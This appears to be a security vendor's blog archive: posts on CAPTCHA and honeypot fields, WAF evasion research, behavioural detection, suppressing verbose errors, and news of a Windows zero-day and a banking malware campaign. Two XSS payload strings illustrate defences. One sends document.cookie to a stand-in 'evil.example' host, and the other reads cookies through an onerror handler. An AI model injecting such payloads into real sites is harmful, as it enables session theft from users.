Is CAPTCHA Best for Form Spam?

Posted: August 1st, 2016
Filed under: Web and Application Security


CAPTCHA tests are not hard to find on the web. But neither are complaints about them.

Do you have CAPTCHA on your site to block form spam? Other options to filter out bot form submissions exist. Let’s explore whether those options would work for your company, or if you should stick to the CAPTCHA standard.


Why CAPTCHA?

CAPTCHA protects sites displaying or collecting data with tests that humans can pass but bots cannot. CAPTCHA stands for Completely Automated Public Turing Test To Tell Computers and Humans Apart.

These tests are commonly found when performing online activities such as:

  • Submitting a form
  • Posting a comment
  • Completing registration

There are also drawbacks to using CAPTCHA:

  • It can degrade the user experience when codes are entered incorrectly
  • It can present accessibility issues for users who have difficulty deciphering the codes
  • It creates a security arms race: CAPTCHA technologies progress to make tests harder for bots, bots adapt, and actual users get stuck in between.

 

Have you noticed CAPTCHA tests can be hard? What if these challenges block bots but also lose you human users in the process? As CAPTCHA becomes harder for bots to break, it also becomes harder for humans to decode. If alternatives exist, CAPTCHA is not necessarily the right solution.

Most bots scraping site forms are not tailored to a specific site, unless:

  • You’re running the website of a large corporation
  • Your business is one commonly at risk for a security attack

Therefore, CAPTCHA may be the better choice, but only in certain use cases.

A Different CAPTCHA Solution

People have pretty strong feelings about CAPTCHA. Those feelings came to light when some Port80 Software team members were discussing form spam issues. One senior team member compared CAPTCHA to DEFCON-5. So our challenge was set: find something less off-putting.


One strategy to prevent form spam that seems to work well is the honeypot technique. It is a different methodology from CAPTCHA, one that capitalizes on the default behavior of bots: a honeypot lures bots into exposing themselves and leaves humans alone.

 

In this case, you add an empty form field in the code, but one that a user doesn’t see. Since it is not visible, a human user would not fill it out. But a bot would, because it reads what’s in the code, not what’s visible on the page.

Once you detect that the hidden field has input, you can safely assume this was not the work of an actual human being. Validation on the client side flags it and the form submission fails. If JavaScript is disabled, server-side validation picks it up. And even though it’s a bot, you can display an error message on the page saying the submission didn’t pass your spam validation.
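As a minimal sketch of the server-side check (the hidden field name "website" and the form data here are hypothetical, not a prescribed convention):

```python
def is_spam_submission(form_data):
    """Reject submissions where the hidden honeypot field was filled in.

    Humans never see the field (it is hidden with CSS), so any value
    in it almost certainly came from a bot auto-filling every input.
    """
    honeypot_value = form_data.get("website", "")  # "website" is our hypothetical trap field
    return honeypot_value.strip() != ""

# A human leaves the hidden field empty; a bot fills everything in.
human = {"name": "Ada", "email": "ada@example.com", "website": ""}
bot = {"name": "x", "email": "x@spam.example", "website": "http://spam.example"}

print(is_spam_submission(human))  # False
print(is_spam_submission(bot))    # True
```

The same check can run client-side before submit and server-side as a fallback, so the behavior is identical whether or not JavaScript is enabled.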

Benefits

  • This method is virtually seamless and does not degrade the user experience. Users don’t have to guess at images or figure out what an upside-down, backwards piece of text is saying. A good move might be to make it a starting place: try this first and see how well it reduces your spam and improves user experience.
  • It doesn’t require another API or integrating another service onto your page, thus saving on bandwidth and load times.

Drawbacks

  • This doesn’t offer as much security as the reCAPTCHA API, but it should still work for the majority of companies that aren’t specific targets of security attacks. If you’re a bank, hospital, or other likely target, you’ll still want the rigor of a full Turing test, like CAPTCHA.
  • If a hacker is targeting your site specifically, they will most likely tailor a bot to your site that can mimic human-like behavior and bypass the form check. (Nothing is 100% secure.)

Google and the Future of CAPTCHA

The honeypot technique is just one alternative when it comes to form SPAM. There are some changes web users can expect to see in the future from Google in this area as well. One you may already be seeing is the reCAPTCHA that detects human-like mouse movements to verify a real user is submitting a form.

The other is an invisible reCAPTCHA option:

We know some developers who have been invited to try invisible CAPTCHA before it is officially implemented by Google. We’ll keep you posted on what they find out during their tests.


Are There Holes in Your Web Application Firewall?

Posted: September 17th, 2015
Filed under: Port 80 News, Web and Application Security


Last week, the Port80 Software team took a leisurely stroll through /r/NetSec on Reddit and found a very interesting post. It linked to a paper about vulnerabilities found in popular commercial Web Application Firewall (WAF) products. The findings, and their ramifications for ServerDefender VP, are worth reading about for anyone with an interest in data security.

Evading Web Application Firewall XSS Filters

In his paper, Mazin Ahmed writes:

“Due to the increasing use of Web-Application Firewalls, I conducted a research on all well known Web-Application Firewalls to check their efficiency in protecting against cross-site scripting attacks. The motive behind this research was to confirm that there is no effective way to protect against a vulnerability other than fixing its root cause. The tests were conducted against popular Web-Application Firewalls, such as F5 Big IP, Imperva Incapsula, AQTRONIX WebKnight, PHP-IDS, Mod-Security, Sucuri, QuickDefense, Barracuda WAF, and they were all evaded within the research.”

After reading through the research and running some checks on its validity, we had some burning questions:

  • What does this mean for those of us who rely on WAFs?
  • How about those of us who trust ServerDefender VP?

Here’s what you need to know.

A Quick Refresher on WAFs and XSS

A web application firewall (WAF), as the name implies, is a firewall that can take several forms. It can be an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. These rules protect against common threats such as cross-site scripting (XSS), SQL injection (SQLi), and other web-application vulnerabilities.

“XSS attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are widespread and occur anywhere a web application uses input from a user within the output it generates. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site”[1].
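Mr. Ahmed’s point that nothing protects as reliably as fixing the root cause usually means encoding untrusted input at the point of output, rather than relying on a filter to spot attack strings. A minimal sketch in Python (the payload is a made-up example):

```python
import html

# Untrusted input echoed into a page. Output-encoding it at the point of
# use neutralizes the script, regardless of what any upstream filter missed.
user_input = '<script>document.location="http://evil.example/?c="+document.cookie</script>'

safe = html.escape(user_input)  # becomes &lt;script&gt;..., rendered as text, not code
print(safe.startswith("&lt;script&gt;"))  # True
```

A WAF is a valuable extra layer, but as the research shows, it is a layer that can sometimes be evaded; encoding at output cannot be.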

My WAF has holes in it! Help!


Without getting into the specifics, Mr. Ahmed’s research indicated that all of the WAFs he tested could be exploited using cross-site scripting attacks, the very attacks a WAF should defend against. Some of the scripts he used were old or uncommon, which is how they bypassed the WAFs he tested. As Mr. Ahmed writes, the toughest exploit took him approximately half an hour to find. This is fairly troubling news. Fortunately for the NetSec community, the research was published only after the manufacturers were notified and given time to patch their products.

How Well Does ServerDefender Defend?


The answer may surprise you! (Just kidding). We decided to try some of Mr. Ahmed’s well-documented exploits on ServerDefender VP 2.2.6 to see if it would break.


We were pleased to find that the exploits were greeted with everyone’s favorite “Are you Trying to Hack Us?” error page and logged appropriately as XSS.

From there, we decided to take things a step further and run these exploits past our super secret, not even announced, still in development NEW VERSION of ServerDefender, and were greeted with the same results.

However, we weren’t satisfied with a simple victory. We wanted to know for sure that our product could withstand the same stringent testing the other WAFs went through. So we went directly to the source and contacted Mr. Ahmed to see if he would put ServerDefender through the trial.

The Result?

Our invitation to Mr. Ahmed to test ServerDefender VP was accepted! We will keep you posted as we receive word on his research efforts.

In the meantime, if you are interested in putting ServerDefender VP through your own testing, please get your free 30-day trial of SDVP and give it a try. We’d love to hear your thoughts on it.


Our (Signatureless) Approach to Web Application Security

Posted: February 6th, 2015
Filed under: Web and Application Security


In a recent post, we focused on the problems with the signature-based security model. Signatures have been a staple of web application security and cyber security for some time, but are problematic in the sense that they don’t provide adequate protection in today’s landscape of ever-evolving threats.

Now, we want to explain how we approach web application security with our Web app firewall, ServerDefender.

(We encourage you to go back and read that article in full. It’s a good read, we promise!)

The Behavioral & Algorithm-based approach

Although we don’t use signatures, we still have a means for analyzing and determining whether or not a user is malicious.

Our method analyzes behavior by tracking the actions that occur over the course of a session. Activity is monitored by an algorithm that establishes what bad behavior looks like (we’ll touch on this more later), and should the user cause too many errors, the software will begin to take action. Users who repeatedly cause errors will raise an alert, and the software will begin to impede their site usage until they’re blocked, first temporarily, then permanently.

Behavioral scoring allows error rules to be broader or more generic (not signature matches but actual error states like 404s and 500s) because you’re not blocking on every single error. Continuous tracking and monitoring builds up a sort of “threat profile” that discerns patterns and indicates misbehavior, even before anything that would match a threat signature is seen.
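As an illustrative sketch only (the weights and thresholds below are made up for the example, not ServerDefender’s actual values), behavioral scoring of this kind might look like:

```python
from collections import defaultdict

# Each session accumulates a score for error states (404s, 500s, etc.);
# crossing thresholds escalates the response from allow to delay to block.
WEIGHTS = {404: 1, 500: 3}   # assumed weights, purely illustrative
DELAY_AT, BLOCK_AT = 5, 10   # assumed thresholds, purely illustrative

scores = defaultdict(int)

def record_error(session_id, status_code):
    scores[session_id] += WEIGHTS.get(status_code, 1)
    if scores[session_id] >= BLOCK_AT:
        return "block"
    if scores[session_id] >= DELAY_AT:
        return "delay"
    return "allow"

# A session that keeps causing errors gets progressively impeded.
actions = [record_error("sess-1", 404) for _ in range(4)]  # score reaches 4
actions.append(record_error("sess-1", 500))                # score 7
actions.append(record_error("sess-1", 500))                # score 10
print(actions[-3:])  # ['allow', 'delay', 'block']
```

No single 404 here matches any signature, yet the accumulated profile still flags the session as hostile.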

Whitelist vs. Blacklist = Greylist?

On top of behavioral scoring, we also employ a combination of blacklists and whitelists – a sort of greylist approach.

The signature model is inherently a blacklist approach to security. That means that everything is allowed by default unless it is on a ‘naughty list’ or list of malicious inputs or actions. This is dangerous because the default action is to allow, and only when something is known to be bad is it blocked.

The whitelist approach isn’t perfect either. It is the inverse of blacklisting: everything is blocked by default unless it’s on a list of approved inputs or actions. Think of it as the list at an exclusive club or restaurant: with the whitelist approach, only people whose names are on the list are allowed in, while all others are turned away. The blacklist approach turns away anyone on a disallowed list and lets everyone else in without discretion.
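The difference in default action is easy to see in code. A minimal sketch (the paths are hypothetical):

```python
# The blacklist allows anything not explicitly forbidden;
# the whitelist forbids anything not explicitly approved.
BLACKLIST = {"/admin/backup.zip", "/config.bak"}
WHITELIST = {"/", "/contact", "/products"}

def blacklist_allows(path):
    return path not in BLACKLIST   # default action: allow

def whitelist_allows(path):
    return path in WHITELIST       # default action: block

# An unknown, possibly malicious path slips past the blacklist
# but is stopped by the whitelist.
print(blacklist_allows("/new-exploit-path"))  # True  (allowed by default)
print(whitelist_allows("/new-exploit-path"))  # False (blocked by default)
```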

Here’s an example of one of the whitelists within ServerDefender’s controls. This particular example is not very permissive and shows how broad the controls can be.

Here’s an example of a blacklist in ServerDefender. This shows the specific resources that cannot be requested on a site, with all other resources being allowed.

The whitelist approach is inherently more secure, but more prone to false positives, since the default action is to block. However, our powerful and easy-to-use method for creating exceptions makes maintaining whitelists entirely manageable.

Algorithmic Detection

We also look at a number of factors within a given user input and determine whether an exploit is contained in it. This is the algorithmic type of rule: it’s not based on a specific signature or set of signatures. Instead it looks for the conditions that must be met for a particular type of exploit to be effective, and blocks when those conditions are met. This makes it much more generic than signature-based rules.
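As a crude illustration only (these conditions are our own invention, and real algorithmic rules are far more sophisticated), a condition-based check differs from a signature match like so:

```python
# A signature rule matches one known attack string; a condition-based rule
# checks whether the ingredients of a working exploit are all present.
def signature_rule(value):
    return "<script>alert(1)</script>" in value  # brittle: trivially evaded

def condition_rule(value):
    v = value.lower()
    opens_tag = "<" in v and ">" in v
    executes = any(tok in v for tok in ("script", "onerror=", "onload=", "javascript:"))
    return opens_tag and executes  # generic: catches whole classes of payload

payload = '<img src=x onerror=prompt(document.cookie)>'
print(signature_rule(payload))  # False: the signature misses this variant
print(condition_rule(payload))  # True: the conditions still hold
```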

This does increase the false positive risk, so again, you do need good exception-management. This is something we built into ServerDefender in order to quickly loosen security controls for something very specific, while not compromising the overall security of the app. Plus, it is much more manageable to apply these occasional exceptions than to build up fully accurate whitelists field-by-field for an entire app, and keep them up to date as code changes.

Find the log for your false-positive by either entering the event ID, or filtering down to a specific set of parameters. Right-click and select ‘Add Input Exception’.

The add-exception dialog lets you specify a name, a comment, what criteria to match, and the restrictions to apply.


Philosophy

Signatures may make for a great business model, but they don’t make for a great security model. Signatures don’t account for unknown vulnerabilities, and are too easily bypassed in today’s world of advanced hackers. Our approach is and has always been to create tools that provide real security through algorithmic analysis and distrusting inputs.

If you have any questions about our approach to security, please feel free to reach out to our team. We’d love to chat!


Exploring the LogViewer in ServerDefender VP

Posted: November 15th, 2014
Filed under: IIS & HTTP, Web and Application Security


Security You Can See

For the last few years, we have been developing ServerDefender VP, an advanced Web application firewall for IIS. One of the features that has evolved along with ServerDefender VP is the LogViewer, the hub of the WAF where users can interact with and monitor malicious traffic hitting their site. Since there is so much to do within the LogViewer, it’s easy for a feature or two to be missed, so we’ve decided to explain some of the cool tricks it’s capable of.

What is the LogViewer?

The LogViewer is a tool that visualizes events (blocked threats and errors) that occur in your application and allows you to take a variety of different actions on them with only a few clicks. When selecting an event, users can see an array of pertinent data such as the referrer, user-agent, IP address, session ID, GET and POST data, and other critical information.


What Actions Can I Take on an Event?

There are several different actions that a user can take on an event in the LogViewer. The primary actions are for security settings (blocking IP addresses and creating exceptions), forensic tools (viewing all events by IP, comparing a session against IIS logs), and exporting reports.


Adding Exceptions

One of the key actions available from the LogViewer is the ability to add an exception to an event, such as a false positive. Adding an exception lets users specify new settings should the same event occur again. This means users can tell a blocked action to be allowed and configure new rules for the future.


Forensics

The LogViewer’s forensic tools enable users to gain further knowledge about an event and the session and IP behind it.

“View This Session in IIS Logs” displays the session logs with the errors recorded by ServerDefender VP highlighted. This feature is useful for determining what occurred in a session prior to an error and for establishing the validity of an error, should there be any question around it.

“View this IP Only” displays only the events in the LogViewer attributed to that IP address. This makes it easier to visualize the actions of a single IP address and understand its patterns, which can help users determine what action they should take against the IP, if any.

Questions for Us? Ready to try?

The LogViewer is a powerful tool for viewing malicious traffic in your app and a way to quickly react to events. If there’s anything else you’d like to learn about the LogViewer – or ServerDefender VP in general – send us an email at info@port80software.com or Tweet us @port80software. If you’d like to enjoy a 30-day free trial, go ahead and download now.



How Your HTTP Errors Are Helping Hackers

Posted: October 23rd, 2014
Filed under: Web and Application Security


What Errors Are

Error messages are a fairly standard part of the web: they provide useful information to developers for resolving issues, or indicate to users that something is wrong with a page. While smart developers and site admins will customize error messages to hide sensitive info, sometimes something as simple as a careless change to a configuration file can expose verbose HTTP errors, including 500-level errors that can contain normally hidden details of your application. While these are okay for your developers to see in order to resolve the error, they are not okay for external users to see.

Scenarios in Which You Might See an Error

Of course, errors are not desirable. They are the ugly blemish that haunts every app at some point, and some are more serious than others. Detailed errors can provide contextual information about things like the server’s directory structure, the SQL queries being run, or the modules and libraries loaded by the application framework. By eliciting an error response, a hacker gains context for what creates a particular error state, along with a little extra knowledge about the site.

Why is This Useful?

Even seemingly unimportant or small bits of information can be very useful. With enough time and patience, a hacker can use the initial leakage of information to probe further. Based on the knowledge gained from the initial error, they can dig deeper to see what other errors they can elicit. Much like a detective following a lead from a piece of evidence, a hacker can follow the knowledge gained from a piece of information to its conclusion. In all likelihood, they’ll come across another valuable piece of information via an error (if errors are completely unsuppressed), which will lead them down another path to explore and investigate. All this probing puts a site at real risk, as it increases the chances that a vulnerable piece of software (plugin, library, framework, etc.) is discovered. If a hacker can pinpoint that you’re using version A of X library with Y known vulnerability, then there is a very clear path to exploiting it and causing serious damage.

Recon for Attack – Just like Real War

“Know your enemy,” wrote Sun Tzu in The Art of War, and most would agree that it’s unwise to launch an attack on a target without doing some reconnaissance to find points of weakness and points of strength. This principle applies to web technologies as well. Hackers can use error messages to probe and determine areas of weakness within their target. Giving hackers the ability to create errors without penalty is incredibly valuable to them, as it gives them free rein to scout your site and gear up for attack. If areas of weakness or vulnerability are found during the scouting process, the site can be added to a list of vulnerable sites, which can then be attacked by others in the community.

If finding errors is the first line of attack, then hiding those errors should be the first line of defense. By preventing hackers from gathering accurate information about your site or app, you keep them from gaining the upper hand. Suppressing error messages is part of anti-reconnaissance and a solid defense-in-depth strategy.

An Internal Conflict

On the surface, detailed error messages can be useful for developers to debug issues. In fact, in many cases developers like these messages as it makes their jobs easier. Detailed messages often point right to the source of a problem, even indicating which line of code or which method is problematic and in which file. Just as this little snippet of information is invaluable to a developer doing some debugging, this information is useful to a hacker who is trying to cause trouble. Quickly, we can begin to see a conflict arising between a developer and a security professional:

  1. Dev wants detailed error messages in the app because this makes his/her life easier
  2. IT wants non-detailed error messages because this makes his/her life easier – and it protects the company
  3. Without detailed error messages, dev’s job becomes more difficult, and more time/company money is spent debugging code

While the sysadmin-developer divide is nothing new, this is a sensitive area because security is coming into play. That means that security should take precedence, but it doesn’t mean that developers’ jobs need be made more difficult.


Some interesting articles involving information leakage

  • Five Data Leak Nightmare
  • OWASP on Information Leakage
  • What is information leakage?


Solution with ServerDefender VP

Luckily, this type of recon can be prevented without making developers’ jobs more difficult. Here at Port80, we spent a lot of time thinking about the best way to keep verbose error details out of the hands of hackers. The solution we came up with is very simple: don’t show verbose error messages. Over the last few years we’ve developed a complete web application firewall called ServerDefender VP that handles errors in two ways:

  1. Spot and prevent verbose 500 HTTP errors from being outwardly displayed
  2. Mask all errors with a generic error message, so all errors will look the same to would-be hackers

We also included the ability to whitelist IP addresses. This means that if a developer needs to debug something, the sysadmin can add their IP to a list of excluded IPs. This tells ServerDefender VP to let those IP addresses bypass the error handling controls, therefore allowing users to browse the site without error messages being suppressed.

How does it work?

These capabilities are default features in ServerDefender VP and are powerful ways to prevent reconnaissance. Here’s what happens when ServerDefender VP encounters a 5xx HTTP error:

  • User browses to a page
  • An HTTP error is caused and generated
  • ServerDefender VP catches the response before it’s posted
  • Instead of showing the HTTP error status code, SDVP sends a generic error response. This can be not only a page that discloses no sensitive data, but even a response code that is normalized so that nothing can be inferred from it (e.g., 404 instead of 500).
  • The end user now knows something went wrong, but not specifically what, and can even be shown a helpful site-customized experience to get them back on track
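A minimal sketch of that flow (the status code, page text, and function names here are our own illustration, not SDVP’s actual implementation):

```python
# Any 5xx response is replaced with one generic page and a normalized
# status code, so nothing can be inferred from the error; whitelisted
# developer IPs bypass the masking for debugging.
GENERIC_STATUS = 404
GENERIC_BODY = "Sorry, something went wrong. Please try again."

def mask_error(status_code, body, client_ip, debug_ips=frozenset()):
    """Return the (status, body) the client should actually see."""
    if client_ip in debug_ips:       # whitelisted developer sees everything
        return status_code, body
    if 500 <= status_code <= 599:    # verbose server error: suppress it
        return GENERIC_STATUS, GENERIC_BODY
    return status_code, body

verbose = (500, "ODBC error in /var/www/app/db.py line 42: bad SQL near 'users'")
print(mask_error(*verbose, client_ip="203.0.113.9"))   # generic page, normalized code
print(mask_error(*verbose, client_ip="10.0.0.5",
                 debug_ips={"10.0.0.5"}))              # full details for the developer
```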

This error message can be customized to be anything, but most importantly it ensures that no valuable reconnaissance information is leaked; the error is suppressed by ServerDefender VP and never sent to the client. This error-handling technique takes away the first line of attack and means that hackers won’t be able to find clues that make it easier for them to hack you. We’ll leave you with one more piece of advice from Sun Tzu that sums up SDVP’s attitude toward data-hungry hackers: “Be extremely mysterious… thereby you can be the director of the opponent’s fate.”


Zero-Day Vulnerability (CVE-2014-4114) in Windows Server Exploited by Russian Espionage Group “Sandworm”

Posted: October 14th, 2014
Filed under: IIS & HTTP, Web and Application Security


 

A Russian espionage group is exploiting a zero-day vulnerability in Windows Server 2008 and 2012, iSIGHT Partners reported on Tuesday. Microsoft is currently working on a patch for the vulnerability (CVE-2014-4114), but a number of targets have already been hit.

When exploited, this vulnerability allows an attacker to remotely execute arbitrary code, but requires a specially crafted file and use of social engineering to convince a user to open the file. iSIGHT noted specifically that PowerPoint files were used to exploit the vulnerability.

While there are specific targets that have been named, iSIGHT is also quick to point out that the visibility of the attack is limited and there is potential for broader targeting beyond this group of targets. The known targets include:

  • NATO
  • Ukrainian government organizations
  • A Western European government organization
  • Energy sector firms (specifically in Poland)
  • European telecommunications firms
  • A United States academic organization

The team behind the attacks was dubbed the “Sandworm Team,” based on encoded references in command and control URLs and malware samples that refer to the sci-fi series Dune. iSIGHT reported that it has been monitoring the Sandworm Team since late 2013, and believes they were formed sometime in 2009.

Geopolitical Tensions Creating Targets

The takeaway here seems to be that the attacks do not only target governmental entities. The Sandworm Team has instead targeted entities that are geopolitically relevant in a broader sense: energy, telecommunications, education.

This should serve as a sign of potential threats to come. Private sector businesses that are strategically sensitive in a geopolitical sense might be on some state’s list of targets. This means organizations that share information with, provide services to, or provide infrastructure utilized by governmental organizations may be at risk. State-sponsored attacks will focus on targets with strategic significance which can range from obvious ones like power grids and financial institutions to less obvious targets like research universities.

State-sponsored attacks are on the rise and the targets are becoming broader. Organizations who align themselves with sensitive entities should have a heightened sense of awareness and look to raise their defenses if needed.

We will update this post accordingly as the story continues to develop.


Bank customers attacked with malicious campaigns named “Operation Emmental”

Posted: July 31st, 2014
Filed under: Web and Application Security


from our partners at Net-Square

Criminals were successful in bypassing an Android-based, two-factor authentication system during their spear phishing and malware attacks. The malicious campaign, known as Operation Emmental, was discovered by a security software company earlier this year.

The criminal gang that managed Operation Emmental used phishing attacks to gather bank customers’ personal information and other sensitive data.

They used this information to bypass bank authentication systems used by 34 different banks across four countries.

These attacks were first discovered about five months ago and have been actively targeting customers of financial services firms from Switzerland, Austria, Sweden and Japan. All of the targeted banks use a session-based token, sent via SMS, to act as a second factor for authenticating users before they’re allowed to log into their online bank account.

How Operation Emmental Was Executed

It all starts with a fake email that looks like it was sent by a legitimate and well-known entity. Then the cyber criminals serve malware attached to the email as an apparently harmless Control Panel (.cpl) file.

If users execute the malware, which may be disguised as a Windows update tool, the malware changes their system’s settings to point to an attacker-controlled Domain Name System. This allows attackers to secretly observe and control all HTTP traffic. Next, a new root Secure Sockets Layer (SSL) certificate is installed, which looks legitimate and prevents web browsers from warning victims of a bad/insecure cert as it normally would.

The malware deletes itself leaving behind only the altered configuration settings. This makes the attack difficult to spot: when users with infected computers eventually try to access the bank’s website, they are instead pointed to a malicious site that looks and works just like the real bank website.

The next phase of the attack occurs when users log into the fake banking site. Once logged in, users are instructed to download and install an Android app that generates one-time tokens for logging into their bank. In reality, it will intercept SMS messages from the bank and forward them to a command-and-control server or to another mobile phone number.

This means the cybercriminal gets not only the victims’ online banking credentials through the phishing website, but also the session tokens needed to bank online. The criminals end up with full control of the victims’ bank accounts. Because the credentials are stolen and the user’s authenticated session is compromised, everything appears normal to the bank, as if the user were merely conducting a typical financial transaction. In reality, the user is potentially having their bank account drained without any of the typical banking warning flags going up.

What can you do to protect yourself and your users?

One recommendation comes from the researcher who first discovered this attack: improve the verification schemes for users and user transactions. If the verification process went beyond multi-factor authentication and session-based tokens via SMS, it could prevent this particular type of campaign.

In addition, banks should warn their customers never to click on links in emails, but instead to copy and paste links into the browser’s address bar.

In the remediation report, additional recommendations state that banks should implement open-source Domain-based Message Authentication, Reporting & Conformance (DMARC) technology. DMARC helps verify email origin and domain names, blocking many types of phishing attacks against customers. It is fundamentally important because it ascertains whether email from a domain is spoofed or impersonated.
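As a rough illustration (the domain and report mailbox below are placeholders), a DMARC policy is published as a DNS TXT record on the _dmarc subdomain of the sending domain:

```
_dmarc.example.com.  IN  TXT  "v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.com"
```

Receiving mail servers look up this record, check that a message passes SPF or DKIM alignment for the domain, apply the stated policy (here, reject) to mail that fails, and send aggregate reports to the listed address.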

The lessons learned from Operation Emmental are ones that stretch beyond banking. These concepts can be applied to any type of app with a secure login. If you have any questions about testing or securing your app, please feel free to reach out to us!


The Most Comprehensive Web Application Vulnerability Scanner Benchmark Out There

Posted: March 6th, 2014
Filed under: Web and Application Security


Many of our customers come to us asking how they can test their web applications for vulnerabilities. For an automated approach, there are numerous web application vulnerability scanners out there that can help detect vulnerabilities. With so many options, picking the appropriate scanner can be a little tricky. Which is most accurate? Which is the most thorough? The answer is rarely clear.

Lucky for us, the folks over at Security Tools Benchmarking recently assembled their yearly list of web scanners, aptly named “The Web Application Vulnerability Scanners Benchmark”. The list is very comprehensive and puts both open source and commercial scanners through a gamut of tests. The assessment looks at twelve different aspects of each tool to assist individuals and organizations in their evaluation of vulnerability scanners.

In total, 63 different web application vulnerability scanners were tested (we’d say that’s pretty thorough), with 49 of those being free or open-source projects and 14 being commercial.

The following features were assessed during the evaluation:

  • The ability to detect Reflected XSS and/or SQL Injection and/or Path Traversal/Local File Inclusion/Remote File Inclusion vulnerabilities.
  • The ability to scan multiple URLs at once (using either a crawler/spider feature, URL/Log file parsing feature or a built-in proxy).
  • The ability to control and limit the scan to internal or external hosts (domain/IP).

You can organize the scanners by commercial or open source and see a quick comparison of each scanner’s features. From there you can dive into a detailed report for individual scanners.

View the full commercial comparison.

View the full open source comparison.

If you’re looking for a scanner, we encourage you to take a look at the complete report and evaluation criteria over at the Security Tool Addict blog. If you have questions about remediating or securing vulnerabilities after your scan, you can always contact Port80 Software for advice.

 

No Comments »

Privilege Escalation Vulnerabilities Headline Modest January Security Bulletin

Posted: January 15th, 2014
Filed under: Web and Application Security
Tags: , , , ,


Microsoft is kicking off 2014 with a modest security bulletin, which includes several vulnerabilities for Windows XP and Windows Server 2003. Luckily, none of this week’s batch contains any critical vulnerabilities. We are graced with ‘Important’-level vulnerabilities across the board.

Nevertheless, as with any security update, we recommend downloading and applying as soon as possible.

Apply all the Patches

MS14-001: Microsoft Office, SharePoint Server, Office Web Apps

Vulnerabilities in Microsoft Word and Office Web Apps Could Allow Remote Code Execution (2916605)

Attention, Microsoft Office users with admin privileges: this update is intended for you. It fixes an issue in Microsoft Office that primarily affects the 2010 and 2013 versions. If a specially crafted malicious file is opened using a vulnerable version of Word or other Office software, remote code can be executed. Microsoft says that a successful attack could allow the attacker to gain the same user rights as the current user.

See affected versions and download patches

Read the rest of this entry »

No Comments »

3 Web Security Videos that Will Make You Sleep with the Lights On

Posted: October 30th, 2013
Filed under: Web and Application Security
Tags: , , ,


From the perspective of a business owner, the web can be a terrifying place, rife with threats. We’ve compiled a list of our favorite web security videos that will make you want to disconnect from the internet and hide.

Continue Reading

No Comments »

Securing Azure with ServerDefender VP Web Application Firewall

Posted: July 12th, 2013
Filed under: Web and Application Security


With the growing popularity of cloud platforms such as Windows Azure and Amazon Web Services, the need for a viable cloud security option has increased. Installing and getting started with ServerDefender VP on Microsoft Azure is a simple process that only takes a few steps. If you’re launching a new Azure VM, then you’ll be able to use ServerDefender VP to secure your deployment just as you would with any other virtual or physical instance.

Since ServerDefender VP is a host-based web application firewall, meaning it installs on the server itself, it is able to provide security in the cloud, whereas many hardware web application firewalls cannot (you can’t really deploy a physical piece of hardware on a virtual cloud server). This makes ServerDefender VP well suited to provide application-layer protection on Azure.

Steps to Setting Up ServerDefender VP on Windows Azure

You can get ServerDefender VP up and running in just a few steps:

1) Launch a VM in the Azure console.

2) Connect to the VM and open up Server Manager. Here, you will need to install the IIS server role, as well as both ISAPI Filter and ISAPI Extension roles in order to install ServerDefender VP.

3) Once installation has completed, open up a web browser and visit http://www.port80software.com/products/serverdefendervp and download the appropriate version.

 

4) Run the installer to completion.

5) Start using ServerDefender VP!

It’s as simple as that. With ServerDefender VP running on your Azure VM you can begin to configure it to provide the security you need to protect your apps.

Be sure to download the free trial of ServerDefender VP and check out the documentation for information on how to get started and configure its security policies. If you have questions about getting started with ServerDefender VP on Azure, contact one of our security experts today.

 

No Comments »

Hacked? Who You Gonna Call?

Posted: April 23rd, 2013
Filed under: Web and Application Security


If there’s somethin’ strange in your neighborhood, Who ya gonna call? If it’s somethin’ weird and it don’t look good, Who ya gonna call? Ghostbusters?

You could ask the same question when it comes to the web today: Who are you going to call when you get hacked? The local police? Well that’s not as easy as placing a call for a crime in the physical world. A recent piece by Eileen Sullivan of the Associated Press details how local police struggle with responding to cybercrimes.

There are numerous reasons local authorities cannot deal with hackers. For one, police have to act within their jurisdictions. Even if police had the technical capabilities to track down and stop a perpetrator, if that perpetrator were acting from thousands of miles away there would be little they could do because of jurisdictional limits.
Continue Reading

No Comments »

5 Thoughts to Improve Your Infosec Maturity

Posted: January 8th, 2013
Filed under: Web and Application Security
Tags: , ,


From our partners at Net-Square

The year that was 2012 has ended, and it is time to start thinking about challenges that the New Year shall bring. As defenses get stronger, so do attacks. 2013 shall be the year of hybrid attacks – targeting man and machine together. The greatest challenge for 2013 shall lie in re-designing your Information Security strategy to measure up to heightened expectations. As you make your plans, let me share with you my top 5 thoughts for improving the maturity of your InfoSec program.

1. Plan on staffing a Red Team

A Red Team is “an independent group that seeks to challenge an organization in order to improve effectiveness”. Red Teaming has its origins in the military. In an InfoSec context, Red Teams serve as an “intelligence agency” to identify gaps, vulnerabilities and shortcomings in your organization’s IT infrastructure. The sole agenda of the Red Team is to find the holes before attackers do, while continuously coming up with new threat scenarios that impact the organization’s IT function.

2. Ensure that all IT purchases require InfoSec approval

There are few tasks more thankless than having to maintain security for an IT system that is defective by design. Talking to our clients revealed that 80% of all vulnerabilities fall under the “we know it already” category. “We have inherited a mess”. “We know it is broken, but what do we do?” Do these phrases sound familiar? Well then, make it a policy decision to evaluate and test all major IT requisitions before signing the cheque.

3. Insist upon pre-tested 3rd party developed software

The majority of the vulnerabilities we find lie in 3rd party developed software, or in heavily customized implementations of large packaged applications. Shouldn’t the software vendor have their software tested for security vulnerabilities before selling it to your organization? It is time to insist on it during the procurement cycle, and I would add: insist on getting a white box testing certification.

4. Publish a testing calendar for the entire year…and stick to it!

Announce all your vulnerability assessment and penetration testing schedules for the entire year at the very beginning of 2013. Schedule quarterly or half yearly tests for all critical applications, and at least annual tests for all others. Let all your developers and vendors know of the testing schedules. Do not let the testing schedule get sidetracked by release cycles. Software production shall always be delayed. Delaying your testing shall only prolong the agony.

5. Conduct at least one surprise attack on a critical application

Hackers aren’t going to wait until after your system migration is complete. Hackers aren’t going to spare you during peak transaction hours. Hackers will target your live systems, not your UAT systems. And your IT team will always be stressed – 365 days a year. That is reality. So why conduct fairy-tale penetration testing? As a leader of your InfoSec organization, plan on conducting a surprise attack on the production servers of your critical application during peak business hours. Let me just say that this shall be the shortest path to figuring out the biggest gaps in your organization.

As always, I would like to quote “that which does not kill you makes you stronger.”

